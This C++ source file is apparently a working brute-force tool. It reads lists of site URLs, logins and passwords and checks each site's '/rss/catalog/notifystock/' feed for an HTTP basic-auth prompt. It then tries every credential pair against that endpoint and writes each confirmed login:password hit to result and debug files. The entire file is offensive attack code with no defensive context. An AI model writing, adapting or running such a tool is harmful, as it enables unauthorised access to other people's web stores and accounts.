#include <iostream>
#include <string>
#include <fstream>
#include <regex>
#include <future>
#include <chrono>
#include <ctime>
#include <iomanip>

#include <cpr/cpr.h>
#include <json.hpp>

using namespace std;

int get_status_code(string url, string login, string password);

int main(int argc, char** argv) {
    std::chrono::time_point<std::chrono::system_clock> start, end;
    start = std::chrono::system_clock::now();

    ifstream file_url, file_login, file_pass;
    file_url.open("url.txt");
    file_login.open("login.txt");
    if (argc == 2) {
        string filename(argv[1]);
        file_pass.open(filename);
    } else {
        file_pass.open("password.txt");
    }
    string url_line, login_line, pass_line;
    std::ofstream outfile;

    outfile.open("result.txt", std::ios_base::app);

    std::ofstream debugfile;

    debugfile.open("debug.txt", std::ios_base::app);

    while (file_url >> url_line)
    {
        bool gotoMainLoop = false;
        bool isRealWebsite = false;

        if (file_login.eof()) {
            file_login.clear();
            file_login.seekg(0);
        }

        cout << endl << setw(55) << std::left << url_line;

        while (file_login >> login_line && !gotoMainLoop)
        {
            if (file_pass.eof()) {
                file_pass.clear();
                file_pass.seekg(0);
            }
            while (file_pass >> pass_line  && !gotoMainLoop) {
                string url_line_original = url_line;

                if (!isRealWebsite) {
                   int status = get_status_code(url_line, "ABCDEFGHIJ", "abcdefj");

                   if (status == 401) {
                        cout << ": real website" << endl;
                        isRealWebsite = true;
                   } else {
                        cout << ": bad website" << endl;
                        gotoMainLoop = true;
                   }
                }

                // work only with real websites
                if (isRealWebsite) {
                    std::future<int> fut = std::async (get_status_code, url_line, login_line, pass_line);
                    int status = fut.get();

                    if (status == 200) {
                        debugfile << url_line_original << " " << login_line << ':' << pass_line << " " << status;
                        outfile << url_line_original << " " << login_line << ':' << pass_line << " " << status;

                        // check if password realy works (send one more request with it).

                        int status_verify = get_status_code(url_line, login_line, pass_line);

                        if (status_verify == 200) {
                            file_login.seekg(0, ios::end);
                            file_pass.seekg(0, ios::end);

                            gotoMainLoop = true;
                            cout << "PASSWORD FOUND: " << login_line << ':' << pass_line;

                            outfile << " (verified)" << endl;
                            debugfile << " (verified)" << endl;
                        } else {
                            outfile << endl;
                            debugfile << endl;
                        }

                    } else if (status == 404 || status == 403 || status == 0 || (status >= 300 && status <= 399)) {
                        gotoMainLoop = true;
                    }
                }

            }
        }

    }
    end = std::chrono::system_clock::now();

    std::chrono::duration<double> elapsed_seconds = end-start;
    std::time_t end_time = std::chrono::system_clock::to_time_t(end);

    outfile << "\n\nfinished bruteforce at " << std::ctime(&end_time)
              << "elapsed time: " << elapsed_seconds.count() << "s\n";
    outfile << "========= \n\n\n";
}

int get_status_code(string url, string login, string password) {
    url += "/rss/catalog/notifystock/";
    auto r = cpr::Get(cpr::Url{url},
                      cpr::Authentication{login, password});

    return r.status_code;
}